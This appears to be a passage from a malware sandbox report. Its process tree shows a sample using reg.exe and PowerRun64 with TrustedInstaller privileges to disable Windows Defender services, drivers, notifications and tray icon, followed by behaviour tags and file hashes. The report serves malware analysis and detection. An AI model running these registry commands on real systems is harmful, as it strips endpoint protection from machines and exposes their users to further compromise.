C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f2⤵PID:2508
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f2⤵PID:2504
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender notification settings
PID:2528
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender notification settings
PID:2552
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f2⤵PID:808
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2524 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:1088 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f5⤵PID:1416
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:532 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Modifies Security services
PID:1516
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:840 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Modifies Security services
PID:952
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:620 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Modifies Security services
PID:956
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:464 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:2328 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Modifies Security services
PID:1204
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:348 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Modifies security service
PID:2648
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:2704 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Modifies security service
PID:2768
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:2504 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Modifies Security services
PID:2844
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2560 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:2976 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f5⤵PID:1756
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1972 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:2108 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Modifies Security services
PID:1828
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1692 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2136 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:1136 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Modifies Security services
PID:1316
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1412 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:1680 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Modifies Security services
PID:956
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2204 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:1792 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Modifies Security services
PID:1976
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1920 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2124 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:2076 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Modifies security service
PID:2780
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1980 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2408 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:2044 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Modifies security service
PID:2644
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1508 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Suspicious behavior: EnumeratesProcesses
PID:336 -
C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Modifies data under HKEY_USERS
PID:2812 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Modifies Security services
PID:2964
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Get-MpPreference"2⤵
- Command and Scripting Interpreter: PowerShell
PID:2584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')2⤵
- Command and Scripting Interpreter: PowerShell
PID:1560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')2⤵
- Command and Scripting Interpreter: PowerShell
PID:1272
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241204135709.log C:\Windows\Logs\CBS\CbsPersist_20241204135709.cab1⤵
- Drops file in Windows directory
PID:2016
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
25KB
MD5436c1bb98deeccecb73fad945f1dd3dc
SHA1774313ba911945589971bbc73498d81f060dabe6
SHA25605eae1691149cc66e458d5e5b4430bd3b938b278b8bdb2c887a13c9871004c51
SHA51266ea41b9b4a42f7c40d1ce5b6e82a6f03e8489648b912d96a81efa13d340d4d651078df7c1302c595ca83408e7208d1d79f02165dc27383952a9abe7f851c3e2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51404c21ecacb0680580558d944a6f158
SHA183181329c65a6faf724331cc72b299a0a571ad6a
SHA256d56fdaf9fa6098a1d3b2382d35b5023574a09d10190042b55b4460b4304176f7
SHA5129f819a609a01cf1c90a94abd78cc94b10499f251bf9696fd90dad1704b51f9bcf359739f0ad56048be9108b5d5600915f6c1f3c8aa0a3d46e60858fcdac12d81
-
Filesize
81KB
MD5940b1915cadee0e2b33d80799816f6c7
SHA12c10e4fec3e8c054055d1ed78757117575f273f2
SHA25681e89e7266cfe5158e44f5578c8be61353e781daebdd47a33597e9ec503d379c
SHA512cc3c574fd5392c1b54146b591e22b1c01c95e34a602c403ad96c49b7ee6ad31d1478a00cc1334286addc5cb94496372a172745e9ad20554023e1e22c7da1e1c5